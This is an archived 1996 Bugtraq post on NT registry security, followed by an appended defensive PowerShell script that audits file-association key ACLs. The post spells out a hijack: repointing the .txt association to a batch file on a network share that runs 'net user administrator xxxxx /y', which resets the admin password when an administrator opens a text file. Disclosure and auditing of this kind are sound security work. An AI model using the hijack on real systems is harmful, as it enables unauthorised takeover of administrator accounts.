From proff Sun Sep 29 10:28:45 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA17046 for best-of-security; Sun, 29 Sep 1996 10:28:44 +1000
Received: (sendmail@localhost) by suburbia.net (8.7.4/Proff-950810) id JAA14344; Sun, 29 Sep 1996 09:10:16 +1000
Received: from brimstone.netspace.org(128.148.157.143) via SMTP by suburbia.net, id smtpd14337aaa; Sun Sep 29 09:10:07 1996
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <23431-30126>; Sat, 28 Sep 1996 19:08:57 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id TAA01727; Sat, 28 Sep 1996 19:02:17 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 596170 for BUGTRAQ@NETSPACE.ORG; Sat, 28 Sep 1996 18:07:42 -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id SAA30511 for ; Sat, 28 Sep 1996 18:07:19 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from lux.levels.unisa.edu.au (lux.levels.unisa.edu.au [130.220.16.65]) by netspace.org (8.7/8.6.12) with SMTP id AAA16718 for ; Sat, 28 Sep 1996 00:35:13 -0400
Received: from (itudps@localhost) by lux.levels.unisa.edu.au (SMI-8.6/SMI-SVR4) id OAA10795; Sat, 28 Sep 1996 14:05:29 +0930
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Approved-By: Dan Shearer
Message-ID:
Date: Sat, 28 Sep 1996 14:05:28 +0930
Reply-To: Dan Shearer
Sender: Bugtraq List
From: Dan Shearer
Subject: Re: NT security et al (Dangers of NetBIOS/NBT?)
To: Multiple recipients of list BUGTRAQ
In-Reply-To: <199609271918.PAA09183@gateway.esisys.com>
Approved: proff@suburbia.net

On Fri, 27 Sep 1996, Jacob Langseth wrote:

> here's some more:
> ppl can read portions of the registry remotely (via regedt32.exe).

By default they can _write_ to it too, at least under 3.51 the default
permissions gave Everyone write access to quite a few things.
The canonical example was (is) the key that determines the association
between an application and its extension in File Manager. That can be
changed by an unprivileged, even unknown, user with access to regedt32 on a
connected network. Should the .txt entry be changed to point to:

    \\SomeNTorUnixWorkstation\UnprotectedShare\bogus.cmd

where bogus.cmd contains:

    net user administrator xxxxx /y
    notepad %1 %2 %3 %4 %5

all someone with admin privilege at the console has to do is double-click
on a text file and the admin password is changed. Of course this is a
pretty basic example because the admin would (hopefully) be suspicious on
seeing a DOS box pop up. But it is trivial to write a Win32 app that both
launches notepad and does some malicious trapdoor stuff with the admin
privilege it has been given.

--
Dan Shearer                          email: Dan.Shearer@UniSA.edu.au
Information Technology Unit          Phone: +61 8 302 3479
University of South Australia        Fax  : +61 8 302 3385
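The weakness the post describes is a registry ACL problem: the file-association keys that decide what runs on double-click were writable by Everyone, so an ordinary (or remote) user could redirect an extension to a command on a network share. The script below is an added audit example, not code from the post or from Microsoft. It walks a list of extensions under HKEY_CLASSES_ROOT on a current Windows host, follows each extension to its ProgId's shell\open\command key, and reports any Allow ACE that grants write-class rights to a broad principal, together with the command line the key currently holds and whether that command points at a UNC path. The extension list, the principal list and the `Get-WeakAssociationAcl` function name are assumptions of this example; run it from an elevated PowerShell prompt on the machine being audited.

```powershell
# Added audit example (not from the original post). Assumes a modern Windows
# host with PowerShell 5.1 or later and an elevated prompt.

# Principals that should never hold write rights on association keys.
# This list is an assumption of the example; extend it for your environment.
$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal change what double-click executes.
$WriteRights = [System.Security.AccessControl.RegistryRights]'SetValue,CreateSubKey,WriteKey,ChangePermissions,TakeOwnership,FullControl'

function Get-WeakAssociationAcl {
    param(
        # Extensions to check; '.txt' is the case used in the post.
        [string[]]$Extensions = @('.txt', '.cmd', '.bat', '.exe', '.lnk', '.reg')
    )

    foreach ($ext in $Extensions) {
        $extKey = "Registry::HKEY_CLASSES_ROOT\$ext"
        if (-not (Test-Path -Path $extKey)) { continue }

        # The extension key's default value names a ProgId (e.g. txtfile);
        # that ProgId's shell\open\command key holds the actual command line.
        $progId = (Get-ItemProperty -Path $extKey -ErrorAction SilentlyContinue).'(default)'
        $keys = @($extKey)
        if ($progId) {
            $keys += "Registry::HKEY_CLASSES_ROOT\$progId\shell\open\command"
        }

        foreach ($key in $keys) {
            if (-not (Test-Path -Path $key)) { continue }
            $command = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'(default)'
            $acl = Get-Acl -Path $key

            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                # Report only ACEs that include at least one write-class right.
                if (($ace.RegistryRights -band $WriteRights) -eq 0) { continue }

                [pscustomobject]@{
                    Extension     = $ext
                    Key           = $key -replace '^Registry::', ''
                    Principal     = $ace.IdentityReference.Value
                    Rights        = $ace.RegistryRights
                    Command       = $command
                    # A command that starts with \\ runs from a network share,
                    # exactly the redirection the post warns about.
                    RemoteCommand = [bool]($command -match '^\s*"?\\\\')
                }
            }
        }
    }
}

# Usage: list every weak ACE found; an empty table means the audited keys
# grant write rights only to principals outside $BroadPrincipals.
Get-WeakAssociationAcl | Format-Table -AutoSize
```

The `Command` and `RemoteCommand` columns are worth keeping even on a host whose ACLs are already tight, because they make the check double as a quick integrity read of what each extension will actually launch. Per-user overrides under HKEY_CURRENT_USER\Software\Classes take precedence over HKEY_CLASSES_ROOT for the interactive user and are outside what this example inspects.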